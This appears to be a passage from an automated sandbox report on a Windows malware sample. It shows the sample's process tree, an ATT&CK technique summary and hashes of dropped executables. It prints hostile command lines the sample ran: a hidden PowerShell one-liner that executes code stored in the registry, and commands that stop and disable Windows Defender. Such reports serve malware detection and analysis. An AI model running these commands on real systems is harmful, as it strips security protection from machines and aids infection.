-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6140 -s 4483⤵
- Drops file in Windows directory
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6140 -ip 61401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4064 -ip 40641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3324 -ip 33241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe dcd4e2d229e6a204038c8ed072934241 t3kpkbwC006FvUI4chaFNw.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4600 -ip 46001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3612 -ip 36121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 432 -p 6020 -ip 60201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1560 -ip 15601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Program Files\Windows Defender\mpcmdrun.exe"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4708 -ip 47081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4872 -ip 48721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5872 -ip 58721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5684 -ip 56841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5124 -ip 51241⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8064 -s 4482⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8064 -s 4482⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 8064 -ip 80641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3956 -ip 39561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4040 -ip 40401⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 1900 -ip 19001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 7392 -ip 73921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 7548 -ip 75481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 7636 -ip 76361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6952 -ip 69521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 4483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5392 -ip 53921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 7068 -ip 70681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 6228 -ip 62281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2584 -ip 25841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 7744 -ip 77441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4228 -ip 42281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5280 -ip 52801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6084 -ip 60841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 6252 -ip 62521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 8176 -ip 81761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 3720 -ip 37201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B29F9F4360D12340F07EA244CEFEB287 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 460FDC7A8AAF9390C326F917C22A83352⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9404BF242CA3FE744486C9A444241478 E Global\MSI00002⤵
- Drops file in Windows directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5624 -ip 56241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3724 -ip 37241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 30840 -ip 308401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8252 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 8252 -ip 82521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 31180 -ip 311801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 49716 -ip 497161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 50108 -ip 501081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7800 -ip 78001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11692 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 11692 -ip 116921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 31788 -ip 317881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 31788 -s 4482⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 8984 -ip 89841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 9416 -ip 94161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 15296 -ip 152961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
-
C:\Program Files (x86)\Windows Defender\MpCmdRun.exe"C:\Program Files (x86)\Windows Defender\MpCmdRun.exe" -DisableService3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
-
C:\Program Files (x86)\Windows Defender\MpCmdRun.exe"C:\Program Files (x86)\Windows Defender\MpCmdRun.exe" -DisableService3⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 696EC8317F1AD6D430553D680CB492CB C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8F80BB1F08EFA5062F88A107A13411DA2⤵
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DA1590A7F56F3C7B60C2744088E5C861 E Global\MSI00002⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 48612 -ip 486121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 46192 -s 4523⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 46192 -ip 461921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 30588 -ip 305881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6428 -ip 64281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7364 -ip 73641⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9304 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 9304 -ip 93041⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 4483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 4483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5576 -ip 55761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 49868 -ip 498681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 10628 -ip 106281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 8664 -ip 86641⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32976 -s 4483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 32448 -ip 324481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 40452 -ip 404521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 39228 -ip 392281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 13208 -ip 132081⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
3Scheduled Task
1Defense Evasion
Modify Registry
11Disabling Security Tools
5Bypass User Account Control
1Virtualization/Sandbox Evasion
1Impair Defenses
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\1907429.exeMD5
debc850b80586a33278d76f15bbc1ad7
SHA12757719e6262195f0f9f2993d23b022dd9f9eceb
SHA256199199a3ef33f001bd7f564470196abc86b5c1c42bc0c0f643f7a177787d96f8
SHA51268a369303b9bf2083984d0dad33ce49be9624f75c52c875d1a1168b795644aaae2255c7d084751ff7f48a274ab283da1b7af1db981b5a3f4d705d6e1fc18c995
-
C:\ProgramData\1907429.exeMD5
debc850b80586a33278d76f15bbc1ad7
SHA12757719e6262195f0f9f2993d23b022dd9f9eceb
SHA256199199a3ef33f001bd7f564470196abc86b5c1c42bc0c0f643f7a177787d96f8
SHA51268a369303b9bf2083984d0dad33ce49be9624f75c52c875d1a1168b795644aaae2255c7d084751ff7f48a274ab283da1b7af1db981b5a3f4d705d6e1fc18c995
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27MD5
ea006ebb562553d2bb1496fc110f4ed3
SHA1819f05fb09a7873ca789262e5aaf3abf75b67cad
SHA25667192f6ef03c90873fed0c2e9e5f673336319cc34a8f61d3c066d7af5dfb177b
SHA512abd0cfb308c157f9bd77364de5ffbdc5c5c501d83d6fff2211b8ca721fa5b863c15de0caaebb4b68442dee439da71ada54e949c83197cd71366b20ceba3bd42a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27MD5
52c72c5743137705db9bc62e2af5428c
SHA10b31a581ec5306d0183676120b002e93b4b23414
SHA2561ba134723cc5320057ed08d0dcc64561830d2d76939625e4e892f7c417813c58
SHA51237fd93f4fc8d3a179a314498fb91cbf1984c05075d49a94dc26cc7d77fef5f586a15608791520decc60f44585de5e4ec8b22768f7806731b62ad3834e3b65aa5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27MD5
52c72c5743137705db9bc62e2af5428c
SHA10b31a581ec5306d0183676120b002e93b4b23414
SHA2561ba134723cc5320057ed08d0dcc64561830d2d76939625e4e892f7c417813c58
SHA51237fd93f4fc8d3a179a314498fb91cbf1984c05075d49a94dc26cc7d77fef5f586a15608791520decc60f44585de5e4ec8b22768f7806731b62ad3834e3b65aa5
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0324aba28588c0.exeMD5
d5c004dede617df99ed245444910da9d
SHA11ebf37bf6a917327053691e87b0187a319e5afe8
SHA256e5de8560c215a6ecb9ca3e59977af6fda52823b499ffa8b5d4434873d88d6f60
SHA512f493949081c04f428e1ee793988a2748ca102dbea73d6e2a8e132457fbe690464873e1b0545c818e8253ca528180f91f44c4935ba215b711304e0138f0bc35c6
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0324aba28588c0.exeMD5
d5c004dede617df99ed245444910da9d
SHA11ebf37bf6a917327053691e87b0187a319e5afe8
SHA256e5de8560c215a6ecb9ca3e59977af6fda52823b499ffa8b5d4434873d88d6f60
SHA512f493949081c04f428e1ee793988a2748ca102dbea73d6e2a8e132457fbe690464873e1b0545c818e8253ca528180f91f44c4935ba215b711304e0138f0bc35c6
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0328255c4bce6fb.exeMD5
d60a08a6456074f895e9f8338ea19515
SHA19547c405520a033bd479a0d20c056a1fdacf18af
SHA256d12662f643b6daf1cfca3b45633eb2bf92c7928dbd0670718e5d57d24fb851e0
SHA512b6cbd259e84826ccd2c99c7a66d90f1c2201d625eea6adcd37205e8adf4383ae44306ae1df682fb81b7e38c18bce017a69fba5141702263e4d480b4a30106c8e
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0328255c4bce6fb.exeMD5
d60a08a6456074f895e9f8338ea19515
SHA19547c405520a033bd479a0d20c056a1fdacf18af
SHA256d12662f643b6daf1cfca3b45633eb2bf92c7928dbd0670718e5d57d24fb851e0
SHA512b6cbd259e84826ccd2c99c7a66d90f1c2201d625eea6adcd37205e8adf4383ae44306ae1df682fb81b7e38c18bce017a69fba5141702263e4d480b4a30106c8e
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun033e271e0ce96c08.exeMD5
dcf289d0f7a31fc3e6913d6713e2adc0
SHA144be915c2c70a387453224af85f20b1e129ed0f0
SHA25606edeee5eaf02a2ee9849ca2b8bc9ec67c39c338c9b184c04f5f0da7c6bedfa5
SHA5127035e016476ce5bd670dc23cf83115bb82b65e58e858e07c843a3e77584a3c0119aaa688f73761ac3388b648ab9dbf88378aa0a6fe82e269b8e9bd347c37ebca
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun033e271e0ce96c08.exeMD5
dcf289d0f7a31fc3e6913d6713e2adc0
SHA144be915c2c70a387453224af85f20b1e129ed0f0
SHA25606edeee5eaf02a2ee9849ca2b8bc9ec67c39c338c9b184c04f5f0da7c6bedfa5
SHA5127035e016476ce5bd670dc23cf83115bb82b65e58e858e07c843a3e77584a3c0119aaa688f73761ac3388b648ab9dbf88378aa0a6fe82e269b8e9bd347c37ebca
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0351a0558292.exeMD5
bdbbf4f034c9f43e4ab00002eb78b990
SHA199c655c40434d634691ea1d189b5883f34890179
SHA2562da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0351a0558292.exeMD5
bdbbf4f034c9f43e4ab00002eb78b990
SHA199c655c40434d634691ea1d189b5883f34890179
SHA2562da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun038aa349e3318e.exeMD5
24766cc32519b05db878cf9108faeec4
SHA1c553780cb609ec91212bcdd25d25dde9c8ef5016
SHA256d7cdfb895940efd584c78b7e56f9ed720491234df489ee9eb9aa98c24714d530
SHA5125b911d6bbb119b04f24ff21bd720d9a7d6f02d49a4cd0f533f0dc0d48b107244f5a8f028982b566d2b999420b30d047908df0c20e29acdc57b63df20c785bec3
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun038aa349e3318e.exeMD5
24766cc32519b05db878cf9108faeec4
SHA1c553780cb609ec91212bcdd25d25dde9c8ef5016
SHA256d7cdfb895940efd584c78b7e56f9ed720491234df489ee9eb9aa98c24714d530
SHA5125b911d6bbb119b04f24ff21bd720d9a7d6f02d49a4cd0f533f0dc0d48b107244f5a8f028982b566d2b999420b30d047908df0c20e29acdc57b63df20c785bec3
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun038db98f99bf9a.exeMD5
7c3cf9ce3ffb1e5dd48896fdc9080bab
SHA134b4976f8f83c1e0a9d277d2a103a61616178728
SHA256b3049882301853eed2aa8c5ac99010dd84292d7e092eb6f4311fa535716f5d83
SHA51252ec2ec50a2d4ca4f29e6b611176e37fee8693a7c34ec2197ec2ad250d525f607c3d4d70534520d1f5c16fd3f9231d261b00f8c3746d033eab1ed36cdde07473
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun038db98f99bf9a.exeMD5
7c3cf9ce3ffb1e5dd48896fdc9080bab
SHA134b4976f8f83c1e0a9d277d2a103a61616178728
SHA256b3049882301853eed2aa8c5ac99010dd84292d7e092eb6f4311fa535716f5d83
SHA51252ec2ec50a2d4ca4f29e6b611176e37fee8693a7c34ec2197ec2ad250d525f607c3d4d70534520d1f5c16fd3f9231d261b00f8c3746d033eab1ed36cdde07473
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0397381f1f458e.exeMD5
f01cb242bdcd28fa53da087bccd1a018
SHA11eda5797f315ae5351889524b4adaeb7ed062002
SHA2569279a95af173efac5d6b0058efad8789e1948451910f73ad2d163121e6c4d350
SHA5125e9a134d9ed6d105993c3d899a8521881f0db13094fa541a1fa7073a234434f8f22867aaf9987022335fea14961b9e5b33556f5ceeab77798e2481a6351f5025
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0397381f1f458e.exeMD5
f01cb242bdcd28fa53da087bccd1a018
